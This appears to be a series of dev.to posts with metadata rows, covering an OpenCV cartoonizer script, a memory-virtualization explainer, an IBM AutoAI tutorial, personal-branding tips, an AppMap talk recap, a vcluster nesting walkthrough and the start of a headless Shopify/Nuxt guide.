center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((image.shape))
return res2
```
```python
if __name__ == "__main__":
image = cv2.imread(filename)
resized_image = resizeImage(image)
coloured = ColorQuantization(resized_image)
contoured = findCountours(coloured)
final_image = contoured
save_q = input("Save the image? [y]/[n] ")
if save_q == "y":
cv2.imwrite("cartoonized_"+ filename, final_image)
print("Image saved!")
```
This is our final result:

Thank you all.
| stokry |
706,698 | Virtualizing Memory | In the last article, we asked ourselves how the operating system gives each process the illusion that... | 12,643 | 2021-05-24T00:05:40 | https://www.thesystemsprogrammer.com/posts/virtualizing-memory | computerscience, firstyearincode, systems, linux | In the last article, we asked ourselves how the operating system gives each process the illusion that it has its own address space despite only having one hardware RAM. This is one of the most important and most complicated virtualization techniques that the operating system performs. Because of that we will discuss memory virtualization in three separate articles. The goals of the operating system with respect to memory are as follows:
- Give processes a contiguous address space
- Give processes memory isolation from each other
- Do both of the above efficiently with respect to memory usage and processing speed
Let’s first talk about what memory is. Memory can be thought of as a series of slots. 32-bit memory has 32-bit slots and 64-bit memory has 64-bit slots. The size of a computer’s memory can be quite large. For example, on my Mac, the size of the memory is 8 gigabytes. Each memory slot (more commonly referred to as address), is numbered. Memory 8 gigabytes large with 64-bit slots is numbered 0 to 8,000,000,000 each at intervals of 8 bytes (64-bits).
Diving a bit deeper, what does a specific process’s memory address space look like? There are a couple important sections in a program’s memory and they are: the stack, the heap, the code, and the data. At the bottom is the text segment, this is where the code lives. Above that is the data segment; variables that are global or static live here. Above that is the heap segment. This is where data allocated at runtime using the *malloc* call in C, for example, is located. The heap grows upwards, memory is allocated at the bottom first and grows to the top. Conversely, the stack is above the heap and grows downward. The stack area is used for local variables that exist only during the duration of its scope and are automatically free’d when the scope is exited.

## Contiguous Address Space
It’s important for a process to have the illusion that it has a contiguous address space. If it doesn’t, then pointer arithmetic can not happen and we wouldn’t be able to allocate memory larger than a word at a time. A programmer needs a consistent view of memory to them to be able to write code that performs deterministically. For example, the program needs to know that the calling function’s stack is above the callee function’s stack. Otherwise, when exiting the scope of a function, the programming language wouldn’t know where to go to find the next instruction.
One way to give programs a contiguous address space is by dividing up the computer’s total available memory (or RAM - random access memory) into a fixed number and giving each process one of these chunks.

The obvious downside of this approach is that we may only be able to have a fixed number of processes running at a particular time. For example, if I divided up my computer’s 8 gigabytes of RAM into 1 gigabyte per process, then I would only be able to have 8 processes running simultaneously. The 9th process wouldn’t have a chunk of memory readily available to it! Additionally, there will be a large amount of wasted memory since all these 8 processes would likely not use up the entire address space.
How can we minimize the amount of unused memory and make it so that any process can access a free memory address? One way to do this is to add a layer of indirection that gives each process the illusion that it has a contiguous address space while it may be fragmented in the physical address space. This layer of indirection would be a translation table. The operating system could have a table that translates address spaces as viewed by the process to address spaces as viewed by the actual hardware. Every time the process reads or writes to memory, it needs to ask the operating system to look at the translation table to determine what physical address space corresponds to the virtual address space the process is reading or writing from.
One huge downside of this approach is that every memory access has to go through the operating system! Since most programs out there need to access memory frequently, having the operating system maintain this data structure and check it on every memory access would take up a lot of CPU cycles. How can we make this lookup faster? One way to make it faster is by having this translation table live in hardware and have the hardware do the translation instead of the operating system doing it. This would be much faster!
A common implementation of this is to have a translation lookaside buffer (TLB) in hardware. The TLB will map virtual addresses to physical addresses and is updated by the operating system. When the hardware looks up a virtual address in the TLB, if the translation doesn’t exist, the hardware executes a handler in the operating system. The operating system will fill the TLB with the correct address and the instruction will re-execute. Now, the user process does not need to request an address translation from the operating system everytime it reads or writes to memory. Instead, the hardware does the memory address translation under the hood.
Let’s see how this might work in practice. Let’s say a user process wants to allocate some memory at address 0x00. The CPU attempts to access the address 0x00 by first looking for a translation in the TLB. Because this is the first time the program is attempting to access 0x00, it doesn’t find any entry for 0x00 in the TLB and it jumps to execute instructions in the operating system. The operating system then checks to see if the process can still allocate memory (it is not at its memory limit). If it does, then it finds a memory address that is unused by any other processes. To do this, the operating system needs a mapping of memory addresses to whether it is available or not. Once the operating system finds an available physical address, lets say 0x10, it fills the TLB with the virtual address to physical address mapping 0x00 -> 0x10. Then, it will resume the execution of the CPU instruction. The next time the CPU wants to read the data at virtual address 0x00, the CPU looks it up in the TLB and finds the physical address is 0x10 and is able to pull the value correctly.
To make all this possible, the operating system needs a data structure for the mapping of virtual memory addresses to its physical memory address. Wait a minute...this means that for every memory address, we need another memory address to tell us what physical address a virtual address maps to (if it does at all). Woah, this means that we lose half the memory addresses available to us.
Is there a way we can use memory a little bit more efficiently so we don’t lose half of it to operating system accounting overhead? Yes, there is actually! What if instead of a one-to-one mapping of physical address space to whether it is free or not, we map things in larger chunks. For example, if we have a chunk size of 256 addresses, then we would have one entry in memory representing whether addresses 0 - 255 are free, another entry representing if addresses 256 - 511 are free, etc… What is the space complexity of this scheme? Instead of having to reserve half our memory for a virtual address to physical address mapping, we spend 1/256 the amount of memory on it. This is a huge win and the chunk size parameter can be tuned! I call this a chunk but it is more commonly referred to as a page and the technique referred to as paging. Let’s see an example of how all this works.
Let’s say that our program wants to access memory address 0x0110 (address 272 in decimal). If our page size is 256, then the TLB will use the last two bits as an offset into the page, and the remaining bits to find the virtual to physical page mapping.

The TLB will first identify the offset which is 16 in decimal (0x10). Next, it will identify the remaining bits used to find the virtual to physical page mapping. The remaining bits are 0x01 in hex which corresponds to the virtual to physical page table mapping at index 1.
The TLB will take the physical page frame and append the offset to generate the physical memory address that the program will find the data the CPU is requesting.
Great, we now have an efficient way of giving processes the illusion that it has a contiguous address space and access exclusive access to physical hardware when it really doesn’t! The next thing we need to worry about is memory isolation between processes.
## Memory Isolation
What’s stopping a malicious process (or a buggy process) from accessing an area of memory that it isn’t allocated? Easy! We can re-use the address translation mechanism for creating a contiguous address space. In the TLB, we can include data about the active process. If the active process running an instruction doesn’t match the TLB entry, then the CPU will trap and execute a SEGFAULT signal handler into the operating system.
## Demand Paging
So...are we done? Is that what all modern operating systems do? Nope, one more question! Our computers are not limited to a fixed number of processes, so how do they do it while still providing memory isolation between processes? The answer to this is demand paging. Demand paging was an invention during the multi-programming era of the operating system initially invented by the Atlas operating system. The trick is: we can store the memory chunk of a process that isn’t running to disk. When this process requests the memory again, the operating system swaps it from disk and back into memory. We’re effectively swapping out these pages of memory and putting it into disk when it is not needed and bringing it back when it is needed. We are now able to run many processes on the operating system without worrying about the specific number of allotted chunks.
## Conclusion
These are the general principles behind how physical memory is virtualized by the operating system. If there is something you are curious to learn more about, feel free to reach out to me on Twitter or via email.
| thesystemsprogrammer |
708,255 | Think Lab 2124 : Build & Deploy AI/ML Models w Multiple Datasets w AutoAI - Tutorial B | Welcome to Tutorial Tuesday! We'll pick up where we left off last week with our Think Lab... | 0 | 2021-05-25T20:08:36 | https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-tutorial-b-167 | #Welcome to Tutorial Tuesday!
We'll pick up where we left off last week with our Think Lab 2124 [Tutorial A: Build & Deploy a Data Join Experiment](https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-part-a-24pk)!
##AutoAI Overview
AutoAI in Cloud Pak for Data automates ETL(Extract, Transform, and Load) and feature engineering process for relational data, saves data scientists months of manual data prep time and acheives results comparable to top performing data scientists.
The AutoAI graphical tool in Watson Studio automatically analyzes your data and generates candidate model pipelines customized for your predictive modeling problem. These model pipelines are created iteratively as AutoAI analyzes your dataset and discovers data transformations, algorithms, and parameter settings that work best for your problem setting. Results are displayed on a leaderboard, showing the automatically generated model pipelines ranked according to your problem optimization objective.
Collect your input data in a CSV file or files. Where possible, AutoAI will transform the data and impute missing values.
**Notes:**
* Your data source must contain a minimum of 100 records (rows).
* You can use the IBM Watson Studio Data Refinery tool to prepare and shape your data.
* Data can be a file added as connected data from a networked file system (NFS). Follow the instructions for adding a data connection of the type Mounted Volume. Choose the CSV file to add to the project so you can select it for training data.
##AutoAI Process
Using AutoAI, you can build and deploy a machine learning model with sophisticated training features and no coding. The tool does most of the work for you.
AutoAI automatically runs the following tasks to build and evaluate candidate model pipelines:
* Data pre-processing
* Automated model selection
* Automated feature engineering
* Hyperparameter optimization
In this Think Lab, you will see how to join several data sources and then build an AutoAI experiment from the joined data. The scenario we’ll explore in Part B of the Lab is for a mobile company that wants to understand the key factors that have an impact on user experience in their call center. You will use IBM AutoAI to automate data analysis for a dataset collected from a fictional call center. The objective of the analysis is to gain more insight on factors that impact customer experience so that the company can improve customer service. The data consists of historical information about customer interaction with call agents, call type, customer wireless plans and call type resolution.
##Project Requirements
[IBM Cloud (Free) Lite Tier Account](https://ibm.biz/think-2021)
##Project Setup Steps
1. [Create an IBM Cloud Lite Tier Account](https://ibm.biz/think-2021)
2. Create a Watson Studio Instance
3. Provision Watson Machine Learning & Cloud Object Storage Instances
4. Create a New Project
5. Download the Call Center Dataset from the Gallery
6. Unzip the Call Center Dataset's .zip File
7. Add the Call Center Datasets to the Project
##Project Setup
[See Tutorial A for Project Setup](https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-part-a-24pk)
##Think Lab Overview
In Tutorial B of this **Think Lab**, you will use IBM AutoAI to automate data analysis for a dataset collected from a fictional call center. The objective of the analysis is to gain more insight on factors that impact customer experience so that the company can improve customer service. The data consists of historical information about customer interaction with call agents, call type, customer wireless plans and call type resolution. Each source of information is kept in a separate table (a CSV file).
Using the data join capabilities of AutoAI, you will connect the tables using common coloumns, or keys, to create a single data source, without needing to write SQL-like queries. Additionally, AutoAI will do some automated data preparation, or feature engineering on the combined data before using the data to train the model.
##About the Data

The data is divided as follows:
* **User_experience**: User experience reflects the satisfactory feedback from customers to each call agent daily.
* **Call_log**: Records historical information about the calls from customers to the call center in the last 3 years.
* **Call_Type**: Records call type information.
* **Wireless_Plans**: Records the kind of wireless plans customers are subscribed to.
* **Call_Resolution_Type**: Records type of call resolution.
##Steps Overview
This tutorial presents the basic steps for joining data sets then training a machine learning model using AutoAI:
* Add and join the data
* Train the experiment
* Deploy the trained model
* Test the deployed model
##Think Lab - Tutorial B Steps
1. Create a New AutoAI Experiment
2. Build the Data Join Schema
3. Run the AutoAI Experiment
4. Explore the Holdout & Training Data Insights
5. Deploy the Trained Model
6. Score the Model
7. View the Prediction Results
##Think Lab - Tutorial B: AutoAI Data Join Multi-Classification
###1. Create a New AutoAI Experiment
####Add a New AutoAI Experiment to the Project
Click **Add to Project (+)**

Select **AutoAI experiment**

####Associate a Machine Learning Service Instance
Select a Watson Machine Learning Service Instance from the dropdown menu. Click **Create**

####Add the Call Center Datasets
Click **Select from project**

Select the call center data assets. Click **Select 5 Assets**

**Optional**: You can view metrics on each data source by clicking on it in the Data Source window.

###2. Build the Data Join Schema
The main source contains the prediction target for the experiment. Select **User_experience.csv** as the main source, then click **Configure join**.

In the data join canvas you will create a left join that connects all of the data sources to the main source.
####Use the Data Join Table to Build the Schema

Setup the nodes to match the following image to make connecting the nodes easier.

Drag from the node on one end of the **User_experience.csv** box to the node on the end of **Call_log.csv**.

In the panel for configuring the join, click **(+)** to add the suggested keys **Agent_ID** and **Call_Date** as the join keys.

Repeat the data join process until you have joined all the data tables.


####The Completed Data Join Schema Should Look Like This:

Choose **User_Experience** as the column to predict.

AutoAI analyzes your data and determines that the User_Experience column contains information making the data suitable for a **Multiclass Classification** model. The default metric for a **Multiclass Classification** model is optimized for **Accuracy & run time** automatically by AutoAI.
**Note**:
* Based on analyzing a subset of the data set, AutoAI chooses a default model type: binary classification, multiclass classification, or regression. Binary is selected if the target column has two possible values, multiclass if it has a discrete set of 3 or more values, and regression if the target column is a continuous numeric variable. You can override this selection.
* AutoAI chooses a default metric for optimizing. For example, the default metric for a binary classification model is Accuracy.
* By default, ten percent of the training data is held out to test the performance of the model.
###3. Run the AutoAI Experiment



###4. Explore the Holdout & Training Data Insights
Pipeline Comparison

Eplore the Leading Pipeline

Model Evaluation

Threshold Chart

Feature Importance

From the feature importance chart, the most important feature is count **(*Call_Type_Description*)** which is the total calls in a day.
Other important features are from the **After_Call_Work_Time**, which are talk time and queue time. These features affect users experience the most.
**The call center management team should pay attention to these features and try to figure out how to improve user’s experience by adjusting these features.**
###5. Deploy the Trained Model
####Click **Save as** and Select **Model**

####Click **Create**

####Click **View in project**

####Add the Call Center Datasets to the Deployment Space
Navigate to the **Deployment Space**

Click **browse for files to upload**

Select Call Center Data Sources


####Promote the Trained Model to the Deployment Space
Click **Promote to deployment space**

Select the Deployment Space from the dropdown menu.

Check the **Go to the model in the space after promoting it** box.

Click **Promote**
####Deploy the Trained Model
Click **Create deployment**

####Create a New Batch Deployment
Add a name for the new Batch deployment.

####Configure the Hardware Definition
Select the **Data Join** hardware.

Select the **Model Scoring** hardware.

Click **Create**


###6. Score the Model
To score the model, you create a batch job that will pass new data to the model for processing, then output the predictions to a file. **Note**: For this tutorial, you will submit the training files as the scoring files as a way to demonstrate the process and view results.
####Create a New Batch Job
Click **Create Job**

Add a name for the new Batch job. Click **Next**

Keep the current **Hardware configuration**. Click **Next**

Keep the **Schedule off**. Click **Next**

####Add the Scoring Files
You will see the training files listed. For each training file, click the **Select data source** button, and choose the corresponding scoring file.

**WARNING** : Schema mismatch. The column types in this data asset do not match the column types in the Model Schema. Click **Continue** to select anyway.

Add **call-predictions.csv** as the Ouput file name.

####Run the Batch Job
Click **Create**


####View the Batch Job

####Wait for the Batch Job to Complete
Starting...

Running...

Completed

###7. View the Prediction Results
Download **call-predictions.csv**, and view the prediction results in Excel.

#CONGRATULATIONS!

###You've completed Think Lab 2124: Build & Deploy AI/ML Models w Multiple Datasets w AutoAI!
Tune in next week for our next Tutorial Tuesday post.
Follow for more Cloud Native & Watson AI/ML content:
https://linktr.ee/jritten | jritten | |
708,273 | Things you should know about personal branding. | When you Google your name, what comes up? Hello 👋, my gorgeous friends on the internet, today... | 0 | 2021-05-25T15:24:44 | https://dev.to/unclebigbay/things-you-should-know-about-personal-branding-2g2a |
When you Google your name, what comes up?

<hr />

Hello 👋, my gorgeous friends on the internet, today I will be sharing some tips which I am following to build my personal brand, that I feel can come in handy when building your own personal brand too, this article also contains reasons you should have your personal brand in the first place.
>
Do you know that your name is the greatest asset that you have? and that turning it into a brand people can trust, can as well help you have a very good relationship with other people and also help build a very successful business.
Before we proceed, let me share with you some things I have been doing wrong in the past that have secretly affected the process of building my personal brand which I wasn't aware of, and how I have made amendments to them.
Below are few things **I HAVE BEEN DOING WRONG** and how I have corrected them:
### 1. DIFFERENT PUBLIC NAMES

Honestly, I just realized lately that my Twitter username is totally different from my LinkedIn username and other social media profile, which can make it sometimes difficult for someone trying to reach out, to find me with just a single username.
<hr />
**Correction**: After realizing this, I tried as much as possible to make all my usernames and display names similar across all my social media accounts.
<hr />
I chose **unclebigbay** for all my social media profiles, because it is not as common as my full name **Ayodele Samuel Adebayo**, and when people get to know me more as **unclebigbay**, I can be easily located on the internet. 😉
<hr />
>
Your blog name can also be your brand, you can proceed to search your popular name on Google to see where you fall on the search result.
### 2. DIFFERENT PROFILE PICTURES

Do you know that 7 out of 10 people who are interested in your content will have your profile picture stuck to their memory, this makes it easier for them to recognize any of your social media accounts, given that you have the sample profile picture across all.
<hr />
**Correct**: I took what is called a professional picture, which I will be using for all my social media profiles till my next birthday 😎. **check out my Hashnode [profile](https://hashnode.com/@unclebigbay) **
<hr />
>
I guess you already know how hard it gets with 3 social media accounts with 3 different display names and images. I was guilty of that too. Your personal brand picture might just be an artwork or a cat image. 😉
<hr />
@[Victoria Lo](@victoria) doesn't use her real picture but always stays consistent with the avatar and the cover image across all her social media accounts that I know.

@[Syed Fazle Rahman](@fazlerocks) uses his real picture and stays consistent with it across all his social media accounts that I know.

<hr />
I hope you found that helpful 👇, now, let's proceed to the benefits of having a personal brand.
<hr />
#### 1. IT HELPS YOU FIGURE OUT THE "WHY"

The very first thing you would like to pinpoint when you're branding your name is the value you have to offer under that name, this can range from <span class="rock">Reliability</span>, <span class="rock">Creativity</span>, <span class="rock">Honesty</span> or <span class="rock">Service to others</span>, this is your passion, what you love so much that drives you so much to do what you do.
>
This will help you answer the **Why** you're into what you're doing.
#### 2. IT MAKES YOU STANDS OUT

Creating your personal brand will not only make you figure out your value but will also make you stand out from the pack and as long as you are providing values to others, you will be known specially for your uniqueness.
#### 3. IT HELPS BUILD YOUR ONLINE PRESENCE

The number of people that will trust and follow your brand as you grow will gradually increase as you continue to be consistent with the value that you provide to people through your personal brand, these people will turn your brand into a position of influence since they trust and gain from what you are giving out as value.
>
you can begin to earn from your brand by advertising products from companies to your audience and many more.
#### 4. SOMEONE IS WATCHING

Having your own personal brand and keeping everything consistent will make people think you're organized and that you know what you are really doing, this will make them keep a close watch on your brand space and before you know it, you have gained your next client's trust without even pitching what you do.
>
Your brand has done that 😉
#### 5. IT HELPS ATTRACT OPPORTUNITIES

When you have your own personal brand and you keep the value coming on a consistent basis, you will have a high chance of getting opportunities like:
1. Recommendations
2. Project Collaborations
3. Consultancy
4. Job Interviews
5. Invite as a speaker
6. Mentorships
7. Sponsorship
9. Partnership etc.
**Depending on what you have to offer.**
### How can you Get Started?

Now that you are aware of the benefits of having your own personal brand, I have also come up with things you can start with when you are ready to create your own personal brand 😃.
1. Know your **audience** and **values**
2. Decide what you want to be **known ** for
3. Pick a **unique** name and theme for your brand
4. Be **consistent ** with your style (writing, posts, colors, images)
5. Make sure you're **easy ** to find (no multiple names)
6. Research More on **Networking**
7. Stay **Updated** in your field
8. Grow your **Online presence**
9. Ask for **recommendation**
10. **Live** your brand

And that is a wrap for tip and benefit of having your personal brand, and I hope you enjoyed reading this article and have learned one or two things from it, if you will like to connect with me, kindly check out my [Link-Tree](https://linktr.ee/unclebigbay) 😍 I will be happy to know you.

If you enjoy reading this article, there is a chance you would also enjoy reading about my Birthday Portfolio Present, which is one of the steps of building my own brand, you check it out [HERE](https://unclebigbay.hashnode.dev/hey-its-my-birthday-today-let-me-walk-you-through-my-birthday-portfolio-gift-1)
Thanks and see you in the next one 🏃♂️🏃♂️🏃♂️🏃♂️.
| unclebigbay | |
708,289 | How to auto-document the end-to-end code and data flows of your Rails app | In case you missed it, I’m recapping my recent RailsConf 2021 talk in a series of four, short blog... | 12,899 | 2021-05-27T11:19:04 | https://dev.to/appmap/how-to-auto-document-end-to-end-flows-with-appmap-41d2 | rails, techtalks | In case you missed it, I’m recapping my recent [RailsConf 2021](https://www.railsconf.org/) talk in a series of four, short blog posts. Check out [Part 1 - We need a better way to communicate and explain our code decisions](https://dev.to/appland/we-need-a-better-way-to-communicate-and-explain-our-code-decisions-1nic).
This post recaps the first of the demos I gave as part of my talk. **Using [AppMap](https://appland.com/products/appmap), I walked RailsConf attendees through how to automatically generate documentation and visualizations for end-to-end flows -- right in your code editor.**
End-to-end flows help us as developers get the right context. They help us figure out how a given web request uses particular database tables, for example, and they help us find important functions performed by code, such as authentication, authorization, and emailing.
**AppMap offers both high-level and low-level views of end-to-end code and data flows.** AppMap behaves like a Google Map, providing interactive navigation of the code. You can write analysis code on the AppMap data, and dive into source code and debuggers for further details.
For Ruby, first install the [AppMap extension VSCode](https://appland.com/docs/quickstart/vscode/step-1.html) or the [AppMap plugin for RubyMine](https://appland.com/docs/quickstart/rubymine/step-1.html). Then install the AppMap gem into your Ruby app and configure which source files and dependency gems you want to record. Finally, record AppMap files by recording your code - either using [app remote recording](https://appland.com/docs/reference/appmap-ruby#remote-recording), or by running test cases. **Unlike static analysis, which only looks at your files on disk, AppMap records your code while it’s running -- meaning it knows exactly what happened at every point and how all the code, services and data stores fit together.**
You can watch this portion of my RailsConf talk in the video clip above, which includes a live tour of AppMap using the Rails Sample App. If you want to follow along in the code or look it up later, I’ve created a fork of the Rails Sample App sixth edition. Within that fork is [a branch called eager loading](http://github.com/land-of-apps/sample_app_6th_ed/tree/eager-loading). Let us know what you think in the [AppMap Discord](https://discord.com/invite/N9VUap6)! Your feedback is really important to us.
**Coming up next** In Parts 3 and 4 of this blog series, I’m going to recap the remaining demos of my RailsConf talk. Using tools that automatically generate documentation and visualizations of architecture and code design, I’ll be documenting web services and data model details.
| kgilpin |
708,313 | vluster Inception Video | Video showing how to create virtual clusters in Kubernetes with vcluster | 0 | 2021-05-25T17:07:04 | https://dev.to/loft/vluster-inception-video-3886 | kubernetes | ---
title: vluster Inception Video
published: true
description: "Video showing how to create virtual clusters in Kubernetes with vcluster"
tags: Kubernetes
//cover_image: https://direct_url_to_image.jpg
---
Running a virtual cluster inside a Kubernetes cluster is cool, but running a virtual cluster inside a virtual cluster is some real inception. Watch this YouTube video to see how you can do this with our open source virtual cluster tool called [vcluster](https://vcluster.com), or read the transcript below if you prefer.
{% youtube KFbAzoUzFO8 %}
## Transcript
Hi, I'm Rich with Loft Labs. Recently, I [did a video](https://youtu.be/J7OQic9M-9w) introducing our open source virtual cluster tool for Kubernetes called vcluster, which lets you run a virtual cluster entirely within a namespace of your host cluster. During the video, I mentioned that you can actually run a vcluster inside of a vcluster, and I thought I'd show you how this vcluster inception works. Let's get to a shell and have a look.
Here's level one, my host cluster. First I'll started up an Nginx deployment with a single pod in the host cluster.
```Bash
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=1
deployment.apps/nginx-deployment created
```
Okay. We now have a single Nginx pod running. Now let's drop down to level two and create our first vcluster.
```Bash
$ vcluster create vc-level-2 -n level2
[info] Creating namespace level2
[info] execute command: helm upgrade vc-level-2 vcluster --repo https://charts.loft.sh --kubeconfig /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/525221466 --namespace level2 --install --repository-config='' --values /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/595064305
[done] √ Successfully created virtual cluster vc-level-2 in namespace level2. Use 'vcluster connect vc-level-2 --namespace level2' to access the virtual cluster
```
vclusters are deployed using Helm. Our vcluster is running in a namespace on the host cluster called level2.
```Bash
$ kubectl get pods -n level2
NAME READY STATUS RESTARTS AGE
vc-level-2-0 0/2 Pending 0 2s
```
In that namespace you can see the vcluster pod running. vcluster uses k3s under the hood, so there's a full-blown API server running in that pod. Let's connect to the vcluster.
```Bash
$ vcluster connect vc-level-2 -n level2
[info] Waiting for vCluster to come up...
[done] √ Virtual cluster kube config written to: ./kubeconfig.yaml. You can access the cluster via `kubectl --kubeconfig ./kubeconfig.yaml get namespaces`
[info] Starting port forwarding: kubectl port-forward --namespace level2 vc-level-2-0 8443:8443
Forwarding from 127.0.0.1:8443 -> 8443
Forwarding from [::1]:8443 -> 8443
```
vcluster connect sets up port forwarding. We'll leave that running and open a new shell.
vcluster connect also creates a kubeconfig file that points at the virtual cluster. Let's point our local kubectl at that kubeconfig.
```Bash
$ export KUBECONFIG=./kubeconfig.yaml
```
And then look at the namespaces.
```Bash
$ kubectl get namespaces
NAME STATUS AGE
default Active 15m
kube-system Active 15m
kube-public Active 15m
kube-node-lease Active 15m
$ kubectl get pods
No resources found in default namespace.
```
We don't see the level2 namespace that was created in the host cluster. Our virtual cluster is running entirely inside of that namespace. We don't see the Nginx deployment that's running in the host cluster either. Let's create an Nginx deployment with two replicas here at level2.
```Bash
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=2
deployment.apps/nginx-deployment created
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-84cd76b964-kp4w6 0/1 ContainerCreating 0 1s
nginx-deployment-84cd76b964-78wnp 0/1 ContainerCreating 0 1s
```
Okay. Now for the real inception action. Let's create a vcluster inside of our vcluster.
```Bash
$ vcluster create vc-level-3 -n level3
[info] Creating namespace level3
[info] execute command: helm upgrade vc-level-3 vcluster --repo https://charts.loft.sh --kubeconfig /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/088217689 --namespace level3 --install --repository-config='' --values /var/folders/gy/d3_c4t1x731_hl8qtrfkhr_h0000gn/T/968839140
[done] √ Successfully created virtual cluster vc-level-3 in namespace level3. Use 'vcluster connect vc-level-3 --namespace level3' to access the virtual cluster
```
And then connect to it. We have to use the level2 kubeconfig and specify a different local port for port forwarding.
```Bash
$ vcluster connect vc-level-3 -n level3 --local-port=8444
[info] Waiting for vCluster to come up...
[done] √ Virtual cluster kube config written to: ./kubeconfig.yaml. You can access the cluster via `kubectl --kubeconfig ./kubeconfig.yaml get namespaces`
[info] Starting port forwarding: kubectl port-forward --namespace level3 vc-level-3-0 8444:8443
Forwarding from 127.0.0.1:8444 -> 8443
Forwarding from [::1]:8444 -> 8443
```
We'll open one more tab for level three and use its kubeconfig. Let's make an Nginx deployment here with three replicas.
```Bash
$ export KUBECONFIG=./kubeconfig.yaml
$ kubectl create deployment nginx-deployment -n default --image=nginx --replicas=3
deployment.apps/nginx-deployment created
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-84cd76b964-czlpz 0/1 ContainerCreating 0 3s
nginx-deployment-84cd76b964-l292w 0/1 ContainerCreating 0 3s
nginx-deployment-84cd76b964-ph79t 0/1 ContainerCreating 0 3s
```
And we only see the three Nginx pods. Let's take a look at our host cluster again. We'll switch to that kubeconfig.
```Bash
$ export KUBECONFIG=~/.kube/config
$ kubectl get pods --all-namespaces
NAMESPACE NAME READY STATUS RESTARTS AGE
default nginx-deployment-84cd76b964-64tbh 1/1 Running 0 24m
kube-system coredns-f9fd979d6-mlctd 1/1 Running 0 77m
kube-system coredns-f9fd979d6-pgnh8 1/1 Running 0 77m
kube-system etcd-docker-desktop 1/1 Running 0 76m
kube-system kube-apiserver-docker-desktop 1/1 Running 0 76m
kube-system kube-controller-manager-docker-desktop 1/1 Running 0 76m
kube-system kube-proxy-j42rb 1/1 Running 0 77m
kube-system kube-scheduler-docker-desktop 1/1 Running 0 76m
kube-system storage-provisioner 1/1 Running 0 77m
kube-system vpnkit-controller 1/1 Running 0 77m
level2 coredns-66c464876b-bg95z-x-kube-system-x-vc-level-3--e33a70f289 1/1 Running 0 8m56s
level2 coredns-66c464876b-gl66g-x-kube-system-x-vc-level-2 1/1 Running 0 24m
level2 nginx-deployment-84cd76b964-78wnp-x-default-x-vc-level-2 1/1 Running 0 9m17s
level2 nginx-deployment-84cd76b964-czlpz-x-default-x-vc-lev-af1154c6f7 1/1 Running 0 9s
level2 nginx-deployment-84cd76b964-kp4w6-x-default-x-vc-level-2 1/1 Running 0 9m17s
level2 nginx-deployment-84cd76b964-l292w-x-default-x-vc-lev-91ce9ee9e0 1/1 Running 0 9s
level2 nginx-deployment-84cd76b964-ph79t-x-default-x-vc-lev-5cdee9fab0 1/1 Running 0 9s
level2 vc-level-2-0 2/2 Running 0 24m
level2 vc-level-3-0-x-level3-x-vc-level-2 2/2 Running 0 9m9s
```
Here we see the Nginx deployment from our host cluster and the two virtual clusters. How does this all work? Each vcluster has an API server inside of it, but it doesn't have a scheduler. So the pods are synced to the host cluster and run there.
And that's a quick look at vcluster inception. You might not have a use case for running nested vclusters, but maybe you do. You could assign each developer at your company a namespace with a vcluster running, and allow them to create additional vclusters inside of it. Either way, it's great to know that to the person using a virtual cluster, it looks like a real Kubernetes cluster.
To learn more about vcluster go to [vcluster.com](https://vcluster.com) or have a look at the code at [github.com/loft-sh/vcluster](https://github.com/loft-sh/vcluster). | richburroughs |
708,352 | Headless Shopify with Nuxt, Tailwind, imgix, & Vercel | Shopify does a lot of items well, but one area that can be improved is overall website performance. I'm diving into easily using Shopify's Storefront Access Token in an API with Nuxt as the front-end and boosting frontend scores. | 0 | 2021-05-26T00:30:20 | https://dev.to/daletom/headless-shopify-with-nuxt-tailwind-imgix-vercel-1ldg | nuxt, webdev, headless, ecommerce | ---
title: Headless Shopify with Nuxt, Tailwind, imgix, & Vercel
published: true
description: Shopify does a lot of items well, but one area that can be improved is overall website performance. I'm diving into easily using Shopify's Storefront Access Token in an API with Nuxt as the front-end and boosting frontend scores.
tags: nuxtjs, webdevelopment, headless, ecommerce
//cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prj32osd8neeq16jj13v.png
---
People have started to realize that their tried and true traditional eCommerce platforms are falling behind when it comes to performance. I wanted to take a look at a particularly popular eCommerce tool with a lower cost barrier, Shopify. Shopify does a lot of things well. Shopify can be a simple tool to manage your products, from price, to images, to inventory. It also does a good job with the checkout process. It has always offered website templates to easily deploy your site on a Shopify front end. It reminds me of a simpler setup than even using a Wordpress template. But when you deploy your eCommerce Website using Shopify, you are often sacrificing on performance for ease of use. It turns out that Shopify has made it quite easy to access the functionality your Shopify account using an API. I am going to show an easy method to utilize Shopify's Storefront Access Token in an API with Nuxt.js as the front end. I will also boost performance scores using imgix for the images and Vercel to host the site.
### Goals For What We Are Building
My goal for this demo is to quickly create a working headless eCommerce website using Shopify. In the end we will have a simple page is displaying three products, with their name and description, all coming from the Shopify API. We will be accessing the Shopify API via a nuxt-shopify SDK, which is essentially a GraphQL API. This way you can request information specific to a product or category, without having to request all info via the API on every page request. This will be set up in Nuxt as the front-end, but will be displayed via Vercel using SSR. This allows end users to modify/add/remove products all in the Shopify UI and have those changes be immediately reflected on the website without having to push or deploy any changes via a webhook. Here are links if you would like to jump ahead to the [Github](https://github.com/daletom/headless-shopify-test01). If you would prefer to follow along in a video, here is the demo on Youtube:
{% youtube vI_JpzCTUX8 %}
## Install Items
Run the following command to start a nuxt project:
```
npm init nuxt-app "projectname"
```
This will provide you a list of items to fill out in your terminal to create your project. I am using Javascript, choose your package manager, Tailwind CSS as my UI framework, I do not need any of these additional modules, choose the LINTER of your choice, no testing framework, a Universal rendering mode, and Static hosting. The final two there are important to do, the rest you can change or modify as you wish.
We will also need to install two other items. This is the nuxt/shopify SDK and the vue-imgix SDK. I will cover these items in more detail below as we utilize them
```
npm install nuxt-shopify
```
Then the vue-imgix SDK
```
npm install vue-imgix
```
## Sign up for Shopify and get Storefront Access Token
